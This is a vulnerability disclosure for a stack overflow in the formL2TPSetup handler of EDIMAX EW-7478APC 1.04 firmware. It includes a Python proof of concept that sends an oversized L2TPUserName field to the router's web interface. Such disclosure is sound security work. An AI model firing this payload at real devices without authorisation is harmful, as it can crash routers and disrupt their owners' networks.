Overview

• The device's official website: https://download.edimax.com/mw/cufiles/files/download/Firmware/EW7478APC_1.04.zip

Affected version

EW-7478APC 1.04

Vulnerability details

The EDIMAX EW-7478APC 1.04 firmware has a stack overflow vulnerability in the formL2TPSetup function. The v106 variable receives the L2TPUserName parameter from a POST request. However, since the user can control the input of L2TPUserName, the statement strcat() can cause a buffer overflow.

POC

import requests

ip = "192.168.2.1"

payload = "A"*5000
data = {
    "submit-url":      "/",
    "L2TPConnect":     "",
    "L2TPDisconnect":  "",
    "L2TPIpMode":      "",
    "macAddr1":        "",
    "enableDuallAccess": "",
    "DUAL_WAN_IGMP":   "",
    "DNSMode":         "",
    "L2TPIPAddr":      "",
    "L2TPMaskAddr":    "",
    "L2TPDefGateway":  "",
    "L2TPGateway":     "",
    "L2TPUserName":    payload,
    "L2TPPassword":    "",
    "L2TPMTU":         "",
    "L2TPConnectType": "",
    "wanMode":         "",
    "isApply":         "",
    "redirect":        "",
}

url = f'http://{ip}/goform/formL2TPSetup'

res = requests.post(url=url, data=data, verify=False)
print(res)